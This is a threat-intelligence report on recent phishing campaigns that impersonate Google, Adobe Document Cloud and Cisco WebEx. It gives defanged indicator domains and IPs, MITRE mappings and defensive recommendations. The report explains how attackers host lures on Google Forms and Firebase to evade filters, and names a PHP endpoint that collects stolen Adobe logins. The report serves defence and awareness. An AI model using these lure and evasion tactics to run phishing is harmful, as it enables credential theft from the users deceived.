Overview: Latest Phishing Campaigns Impersonating Common Applications
This report is an overview of recent phishing campaigns targeting Google, Adobe and WebEx. Phishing is one of the most common initial attack vectors for malware, including ransomware like Ryuk.
Tactics, Techniques, and Procedures
Research by Armorblox reveals a pattern wherein bad actors utilize services like Google Forms, Google Docs and Firebase to host phishing content. A common practice for phishing attacks, these emails impersonate legitimate companies and authorities to pressure users into action. One of the emails analyzed directed users to a Google Form impersonating the well-known Microsoft sign-in page. The links generated through these legitimate Google services will allow phishing emails to evade security controls.
Related Webinar-on-Demand: How to Implement a “Risk-based Strategy for ‘Killer’ Threat Hunting Programs”
This is an example of a benefactor scam email with a Google form link:
Separately, anti-phishing solution provider Cofense uncovered an increase in phishing campaigns impersonating Adobe Document Cloud and Cisco WebEx. WebEx is a common service impersonated in phishing campaigns.
In the attack observed by Cofense, the domains, “hxxp://eliteddi[.]com” and “hxxp://idbrokerwebex[.]com” were used to host convincing content impersonating a WebEx meeting invitation.
The Adobe attacks come with an attached HTML document housing a spoofed Adobe Document Cloud login form, which sends data to “infiniteworks[.]net/IDI/high.php.” Upon further investigation of the domain, we uncovered additional phishing URLs impersonating Adobe, Lloyds Banking Group and Google within the IDI directory. The website is hosted through BlueHost, running a WordPress installation with the default “Twenty Seventeen” theme.
Business Unit Impact
- May lead to compromised user accounts and unauthorized access to data and systems
- May provide malicious actors a foothold within your network to be used for lateral movement
Recommendations
- Provide users with training on best practices to avoid phishing, as well as awareness of recent trends in phishing campaigns
- Implement MFA for users and services
- Block provided IOCs
Indicators of Compromise (IOC)
- infiniteworks[.]net
- eliteddi[.]com
- idbrokerwebex[.]com
- 70[.]40[.]220[.]123
- 192[.]185[.]214[.]103
- 216[.]172[.]161[.]34
Sources
- https://www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign/
- https://cofense.com/online-leader-invites-you-to-this-webex-phish/
- https://cofense.com/document-sharing-services-represent-a-vector-for-phishing-campaigns/
Supporting Documentation:
- MITRE Mapping(s)
- Initial Access: https://attack.mitre.org/tactics/TA0001/
- Phishing: https://attack.mitre.org/techniques/T1566/
- Initial Access: https://attack.mitre.org/tactics/TA0001/
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.
This informed analysis is based on the latest data available.